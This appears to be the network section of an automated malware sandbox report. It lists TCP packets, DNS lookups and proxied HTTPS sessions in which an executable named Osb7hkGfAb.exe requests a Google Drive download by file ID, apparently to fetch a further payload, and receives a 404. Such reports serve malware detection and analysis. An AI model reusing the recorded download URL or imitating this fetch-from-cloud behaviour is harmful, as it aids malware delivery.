                                                                        Jan 10, 2025 16:03:13.651325941 CET44349981142.250.184.238192.168.2.10
                                                                        Jan 10, 2025 16:03:13.998424053 CET44349981142.250.184.238192.168.2.10
                                                                        Jan 10, 2025 16:03:13.998493910 CET49981443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:03:13.998733044 CET44349981142.250.184.238192.168.2.10
                                                                        Jan 10, 2025 16:03:13.998796940 CET44349981142.250.184.238192.168.2.10
                                                                        Jan 10, 2025 16:03:13.998819113 CET49981443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:03:13.998837948 CET49981443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:03:13.999001026 CET49981443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:03:13.999001026 CET49981443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:03:13.999022961 CET44349981142.250.184.238192.168.2.10
                                                                        Jan 10, 2025 16:03:13.999160051 CET49981443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:03:14.007627964 CET49982443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:03:14.007678032 CET44349982142.250.186.97192.168.2.10
                                                                        Jan 10, 2025 16:03:14.007749081 CET49982443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:03:14.008101940 CET49982443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:03:14.008126020 CET44349982142.250.186.97192.168.2.10
                                                                        Jan 10, 2025 16:03:14.656549931 CET44349982142.250.186.97192.168.2.10
                                                                        Jan 10, 2025 16:03:14.656636000 CET49982443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:03:14.661947966 CET49982443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:03:14.661963940 CET44349982142.250.186.97192.168.2.10
                                                                        Jan 10, 2025 16:03:14.662148952 CET49982443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:03:14.662153006 CET44349982142.250.186.97192.168.2.10
                                                                        Jan 10, 2025 16:03:15.080645084 CET44349982142.250.186.97192.168.2.10
                                                                        Jan 10, 2025 16:03:15.080703974 CET44349982142.250.186.97192.168.2.10
                                                                        Jan 10, 2025 16:03:15.080734968 CET49982443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:03:15.080750942 CET44349982142.250.186.97192.168.2.10
                                                                        Jan 10, 2025 16:03:15.080759048 CET49982443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:03:15.080791950 CET49982443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:03:15.081510067 CET49982443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:03:15.081543922 CET44349982142.250.186.97192.168.2.10
                                                                        Jan 10, 2025 16:03:15.081605911 CET49982443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:03:25.105837107 CET49983443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:03:25.105884075 CET44349983142.250.184.238192.168.2.10
                                                                        Jan 10, 2025 16:03:25.105957985 CET49983443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:03:25.106316090 CET49983443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:03:25.106333017 CET44349983142.250.184.238192.168.2.10
                                                                        Jan 10, 2025 16:03:25.756721973 CET44349983142.250.184.238192.168.2.10
                                                                        Jan 10, 2025 16:03:25.756869078 CET49983443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:03:25.757426977 CET49983443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:03:25.757440090 CET44349983142.250.184.238192.168.2.10
                                                                        Jan 10, 2025 16:03:25.757635117 CET49983443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:03:25.757642031 CET44349983142.250.184.238192.168.2.10
                                                                        Jan 10, 2025 16:03:26.160593033 CET44349983142.250.184.238192.168.2.10
                                                                        Jan 10, 2025 16:03:26.160664082 CET49983443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:03:26.160692930 CET44349983142.250.184.238192.168.2.10
                                                                        Jan 10, 2025 16:03:26.160733938 CET49983443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:03:26.160835028 CET49983443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:03:26.160875082 CET44349983142.250.184.238192.168.2.10
                                                                        Jan 10, 2025 16:03:26.160921097 CET49983443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:03:26.177356958 CET49984443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:03:26.177387953 CET44349984142.250.186.97192.168.2.10
                                                                        Jan 10, 2025 16:03:26.177637100 CET49984443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:03:26.177723885 CET49984443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:03:26.177741051 CET44349984142.250.186.97192.168.2.10
                                                                        Jan 10, 2025 16:03:26.837132931 CET44349984142.250.186.97192.168.2.10
                                                                        Jan 10, 2025 16:03:26.837497950 CET49984443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:03:26.839214087 CET49984443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:03:26.839222908 CET44349984142.250.186.97192.168.2.10
                                                                        Jan 10, 2025 16:03:26.839531898 CET44349984142.250.186.97192.168.2.10
                                                                        Jan 10, 2025 16:03:26.839624882 CET49984443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:03:26.839939117 CET49984443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:03:26.883327961 CET44349984142.250.186.97192.168.2.10
                                                                        Jan 10, 2025 16:03:27.293531895 CET44349984142.250.186.97192.168.2.10
                                                                        Jan 10, 2025 16:03:27.293607950 CET44349984142.250.186.97192.168.2.10
                                                                        Jan 10, 2025 16:03:27.293689966 CET44349984142.250.186.97192.168.2.10
                                                                        Jan 10, 2025 16:03:27.293730974 CET49984443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:03:27.293730974 CET49984443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:03:27.293730974 CET49984443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:03:27.299340963 CET49984443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:03:27.299365044 CET44349984142.250.186.97192.168.2.10
                                                                        Jan 10, 2025 16:03:37.323337078 CET49985443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:03:37.323362112 CET44349985142.250.184.238192.168.2.10
                                                                        Jan 10, 2025 16:03:37.323455095 CET49985443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:03:37.323765993 CET49985443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:03:37.323772907 CET44349985142.250.184.238192.168.2.10
                                                                        Jan 10, 2025 16:03:37.952819109 CET44349985142.250.184.238192.168.2.10
                                                                        Jan 10, 2025 16:03:37.952980042 CET49985443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:03:37.953627110 CET44349985142.250.184.238192.168.2.10
                                                                        Jan 10, 2025 16:03:37.953696012 CET49985443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:03:37.955790997 CET49985443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:03:37.955796957 CET44349985142.250.184.238192.168.2.10
                                                                        Jan 10, 2025 16:03:37.956068039 CET44349985142.250.184.238192.168.2.10
                                                                        Jan 10, 2025 16:03:37.956118107 CET49985443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:03:37.956423998 CET49985443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:03:37.999320984 CET44349985142.250.184.238192.168.2.10
                                                                        Jan 10, 2025 16:03:38.344026089 CET44349985142.250.184.238192.168.2.10
                                                                        Jan 10, 2025 16:03:38.344412088 CET49985443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:03:38.344423056 CET44349985142.250.184.238192.168.2.10
                                                                        Jan 10, 2025 16:03:38.344486952 CET49985443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:03:38.344527006 CET44349985142.250.184.238192.168.2.10
                                                                        Jan 10, 2025 16:03:38.344531059 CET49985443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:03:38.344583988 CET44349985142.250.184.238192.168.2.10
                                                                        Jan 10, 2025 16:03:38.344707012 CET49985443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:03:38.344707012 CET49985443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:03:38.357512951 CET49986443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:03:38.357557058 CET44349986142.250.186.97192.168.2.10
                                                                        Jan 10, 2025 16:03:38.357878923 CET49986443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:03:38.357878923 CET49986443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:03:38.357909918 CET44349986142.250.186.97192.168.2.10
                                                                        Jan 10, 2025 16:03:39.049685955 CET44349986142.250.186.97192.168.2.10
                                                                        Jan 10, 2025 16:03:39.049746990 CET49986443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:03:39.050208092 CET49986443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:03:39.050223112 CET44349986142.250.186.97192.168.2.10
                                                                        Jan 10, 2025 16:03:39.050380945 CET49986443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:03:39.050385952 CET44349986142.250.186.97192.168.2.10
                                                                        Jan 10, 2025 16:03:39.485647917 CET44349986142.250.186.97192.168.2.10
                                                                        Jan 10, 2025 16:03:39.485699892 CET44349986142.250.186.97192.168.2.10
                                                                        Jan 10, 2025 16:03:39.485712051 CET49986443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:03:39.485727072 CET44349986142.250.186.97192.168.2.10
                                                                        Jan 10, 2025 16:03:39.485749960 CET49986443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:03:39.485801935 CET49986443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:03:39.486293077 CET49986443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:03:39.486335993 CET44349986142.250.186.97192.168.2.10
                                                                        Jan 10, 2025 16:03:39.486387014 CET49986443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:03:49.518327951 CET49987443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:03:49.518371105 CET44349987142.250.184.238192.168.2.10
                                                                        Jan 10, 2025 16:03:49.519330025 CET49987443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:03:49.522780895 CET49987443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:03:49.522792101 CET44349987142.250.184.238192.168.2.10
                                                                        Jan 10, 2025 16:03:50.152215958 CET44349987142.250.184.238192.168.2.10
                                                                        Jan 10, 2025 16:03:50.152355909 CET49987443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:03:50.152983904 CET49987443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:03:50.152988911 CET44349987142.250.184.238192.168.2.10
                                                                        Jan 10, 2025 16:03:50.153230906 CET49987443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:03:50.153234959 CET44349987142.250.184.238192.168.2.10
                                                                        Jan 10, 2025 16:03:50.542787075 CET44349987142.250.184.238192.168.2.10
                                                                        Jan 10, 2025 16:03:50.542892933 CET49987443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:03:50.542905092 CET44349987142.250.184.238192.168.2.10
                                                                        Jan 10, 2025 16:03:50.543190956 CET49987443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:03:50.543190956 CET49987443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:03:50.543199062 CET44349987142.250.184.238192.168.2.10
                                                                        Jan 10, 2025 16:03:50.543227911 CET44349987142.250.184.238192.168.2.10
                                                                        Jan 10, 2025 16:03:50.543306112 CET49987443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:03:50.543306112 CET49987443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:03:50.552361965 CET49988443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:03:50.552390099 CET44349988142.250.186.97192.168.2.10
                                                                        Jan 10, 2025 16:03:50.552557945 CET49988443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:03:50.553468943 CET49988443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:03:50.553486109 CET44349988142.250.186.97192.168.2.10
                                                                        Jan 10, 2025 16:03:51.238729954 CET44349988142.250.186.97192.168.2.10
                                                                        Jan 10, 2025 16:03:51.238965034 CET49988443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:03:51.240927935 CET49988443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:03:51.240935087 CET44349988142.250.186.97192.168.2.10
                                                                        Jan 10, 2025 16:03:51.241168022 CET44349988142.250.186.97192.168.2.10
                                                                        Jan 10, 2025 16:03:51.241260052 CET49988443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:03:51.241646051 CET49988443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:03:51.283324957 CET44349988142.250.186.97192.168.2.10
                                                                        Jan 10, 2025 16:03:51.653275013 CET44349988142.250.186.97192.168.2.10
                                                                        Jan 10, 2025 16:03:51.653331995 CET44349988142.250.186.97192.168.2.10
                                                                        Jan 10, 2025 16:03:51.653393984 CET44349988142.250.186.97192.168.2.10
                                                                        Jan 10, 2025 16:03:51.653417110 CET49988443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:03:51.653444052 CET49988443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:03:51.654360056 CET49988443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:03:51.654376984 CET44349988142.250.186.97192.168.2.10
                                                                        Jan 10, 2025 16:04:01.682600975 CET49989443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:04:01.682657003 CET44349989142.250.184.238192.168.2.10
                                                                        Jan 10, 2025 16:04:01.682724953 CET49989443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:04:01.683113098 CET49989443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:04:01.683135033 CET44349989142.250.184.238192.168.2.10
                                                                        Jan 10, 2025 16:04:02.409703016 CET44349989142.250.184.238192.168.2.10
                                                                        Jan 10, 2025 16:04:02.410018921 CET49989443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:04:02.411062002 CET49989443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:04:02.411072969 CET44349989142.250.184.238192.168.2.10
                                                                        Jan 10, 2025 16:04:02.411360979 CET49989443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:04:02.411372900 CET44349989142.250.184.238192.168.2.10
                                                                        Jan 10, 2025 16:04:02.797755003 CET44349989142.250.184.238192.168.2.10
                                                                        Jan 10, 2025 16:04:02.797887087 CET49989443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:04:02.798336029 CET49989443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:04:02.798393965 CET44349989142.250.184.238192.168.2.10
                                                                        Jan 10, 2025 16:04:02.798578978 CET44349989142.250.184.238192.168.2.10
                                                                        Jan 10, 2025 16:04:02.799340963 CET49989443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:04:02.799340963 CET49989443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:04:02.813172102 CET49990443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:04:02.813220024 CET44349990142.250.186.97192.168.2.10
                                                                        Jan 10, 2025 16:04:02.813298941 CET49990443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:04:02.813693047 CET49990443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:04:02.813705921 CET44349990142.250.186.97192.168.2.10
                                                                        Jan 10, 2025 16:04:03.444830894 CET44349990142.250.186.97192.168.2.10
                                                                        Jan 10, 2025 16:04:03.444896936 CET49990443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:04:03.445611000 CET49990443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:04:03.445619106 CET44349990142.250.186.97192.168.2.10
                                                                        Jan 10, 2025 16:04:03.445873976 CET49990443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:04:03.445878029 CET44349990142.250.186.97192.168.2.10
                                                                        Jan 10, 2025 16:04:03.868947983 CET44349990142.250.186.97192.168.2.10
                                                                        Jan 10, 2025 16:04:03.869019985 CET44349990142.250.186.97192.168.2.10
                                                                        Jan 10, 2025 16:04:03.869086027 CET44349990142.250.186.97192.168.2.10
                                                                        Jan 10, 2025 16:04:03.869102001 CET49990443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:04:03.869122028 CET49990443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:04:03.869158983 CET49990443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:04:03.871263981 CET49990443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:04:03.871280909 CET44349990142.250.186.97192.168.2.10
                                                                        Jan 10, 2025 16:04:13.919028044 CET49991443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:04:13.919059992 CET44349991142.250.184.238192.168.2.10
                                                                        Jan 10, 2025 16:04:13.919329882 CET49991443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:04:13.920027018 CET49991443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:04:13.920039892 CET44349991142.250.184.238192.168.2.10
                                                                        Jan 10, 2025 16:04:14.566487074 CET44349991142.250.184.238192.168.2.10
                                                                        Jan 10, 2025 16:04:14.566678047 CET49991443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:04:14.567277908 CET44349991142.250.184.238192.168.2.10
                                                                        Jan 10, 2025 16:04:14.567363024 CET49991443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:04:14.569288969 CET49991443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:04:14.569299936 CET44349991142.250.184.238192.168.2.10
                                                                        Jan 10, 2025 16:04:14.569725990 CET44349991142.250.184.238192.168.2.10
                                                                        Jan 10, 2025 16:04:14.569778919 CET49991443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:04:14.570324898 CET49991443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:04:14.611325026 CET44349991142.250.184.238192.168.2.10
                                                                        Jan 10, 2025 16:04:14.970143080 CET44349991142.250.184.238192.168.2.10
                                                                        Jan 10, 2025 16:04:14.970230103 CET49991443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:04:14.970247030 CET44349991142.250.184.238192.168.2.10
                                                                        Jan 10, 2025 16:04:14.970284939 CET49991443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:04:14.970345020 CET44349991142.250.184.238192.168.2.10
                                                                        Jan 10, 2025 16:04:14.970390081 CET49991443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:04:14.970937967 CET49991443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:04:14.970952988 CET44349991142.250.184.238192.168.2.10
                                                                        Jan 10, 2025 16:04:14.970963955 CET49991443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:04:14.970999002 CET49991443192.168.2.10142.250.184.238
                                                                        Jan 10, 2025 16:04:14.983972073 CET49992443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:04:14.984036922 CET44349992142.250.186.97192.168.2.10
                                                                        Jan 10, 2025 16:04:14.984133959 CET49992443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:04:14.984544992 CET49992443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:04:14.984566927 CET44349992142.250.186.97192.168.2.10
                                                                        Jan 10, 2025 16:04:15.636060953 CET44349992142.250.186.97192.168.2.10
                                                                        Jan 10, 2025 16:04:15.636162996 CET49992443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:04:15.639920950 CET49992443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:04:15.639976978 CET44349992142.250.186.97192.168.2.10
                                                                        Jan 10, 2025 16:04:15.640130997 CET49992443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:04:15.640146971 CET44349992142.250.186.97192.168.2.10
                                                                        Jan 10, 2025 16:04:16.140510082 CET44349992142.250.186.97192.168.2.10
                                                                        Jan 10, 2025 16:04:16.140598059 CET44349992142.250.186.97192.168.2.10
                                                                        Jan 10, 2025 16:04:16.140595913 CET49992443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:04:16.140625954 CET44349992142.250.186.97192.168.2.10
                                                                        Jan 10, 2025 16:04:16.140650034 CET49992443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:04:16.140672922 CET49992443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:04:16.140678883 CET44349992142.250.186.97192.168.2.10
                                                                        Jan 10, 2025 16:04:16.140690088 CET44349992142.250.186.97192.168.2.10
                                                                        Jan 10, 2025 16:04:16.140711069 CET49992443192.168.2.10142.250.186.97
                                                                        Jan 10, 2025 16:04:16.140732050 CET49992443192.168.2.10142.250.186.97

                                                                        UDP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Jan 10, 2025 16:02:23.746577978 CET5275753192.168.2.101.1.1.1
                                                                        Jan 10, 2025 16:02:23.753942966 CET53527571.1.1.1192.168.2.10
                                                                        Jan 10, 2025 16:02:25.065788031 CET6022353192.168.2.101.1.1.1
                                                                        Jan 10, 2025 16:02:25.073983908 CET53602231.1.1.1192.168.2.10

                                                                        DNS Queries

                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                        Jan 10, 2025 16:02:23.746577978 CET192.168.2.101.1.1.10xcf55Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                        Jan 10, 2025 16:02:25.065788031 CET192.168.2.101.1.1.10xc7e2Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false

                                                                        DNS Answers

                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                        Jan 10, 2025 16:02:23.753942966 CET1.1.1.1192.168.2.100xcf55No error (0)drive.google.com142.250.184.238A (IP address)IN (0x0001)false
                                                                        Jan 10, 2025 16:02:25.073983908 CET1.1.1.1192.168.2.100xc7e2No error (0)drive.usercontent.google.com142.250.186.97A (IP address)IN (0x0001)false

                                                                        HTTP Request Dependency Graph

                                                                        • drive.google.com
                                                                        • drive.usercontent.google.com

                                                                        HTTPS Proxied Packets

                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        0192.168.2.1049708142.250.184.2384432900C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2025-01-10 15:02:24 UTC216OUTGET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                        Host: drive.google.com
                                                                        Cache-Control: no-cache
                                                                        2025-01-10 15:02:25 UTC1920INHTTP/1.1 303 See Other
                                                                        Content-Type: application/binary
                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                        Pragma: no-cache
                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                        Date: Fri, 10 Jan 2025 15:02:24 GMT
                                                                        Location: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download
                                                                        Strict-Transport-Security: max-age=31536000
                                                                        Content-Security-Policy: script-src 'nonce-LHjucCHZ2G4GNq3c909kdA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                        Server: ESF
                                                                        Content-Length: 0
                                                                        X-XSS-Protection: 0
                                                                        X-Frame-Options: SAMEORIGIN
                                                                        X-Content-Type-Options: nosniff
                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                        Connection: close


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        1192.168.2.1049710142.250.186.974432900C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2025-01-10 15:02:25 UTC258OUTGET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                        Cache-Control: no-cache
                                                                        Host: drive.usercontent.google.com
                                                                        Connection: Keep-Alive
                                                                        2025-01-10 15:02:26 UTC2225INHTTP/1.1 404 Not Found
                                                                        X-GUploader-UploadID: AFIdbgR8Md_kYyzkQHPJy7LqpY8sov7GfnKuFPC628Gfq7ohmnTOKXT-3Tum-SBFUE6BBTg4wLX_lOQ
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                        Pragma: no-cache
                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                        Date: Fri, 10 Jan 2025 15:02:25 GMT
                                                                        P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                        Content-Security-Policy: script-src 'nonce-77mX5IRpx2Zk0xzZUVtWDQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                        Content-Length: 1652
                                                                        Server: UploadServer
                                                                        Set-Cookie: NID=520=NzMsYMa1hwFGHWXncS201MzV8PFMwSf_3qyvCmc5HJg3R3sO1qOPypewvliZYpdKZNCCmXBtsFfacvKWJvxX41yTpmywHEYlWCgQIoQ69oecTDWIRtQQMmkbltULqdlZt_oGviswB68cFN_JFfOg5AnucRBuGDMzy36q3C4c2OKHSrcU19ksRYE; expires=Sat, 12-Jul-2025 15:02:25 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                        Connection: close
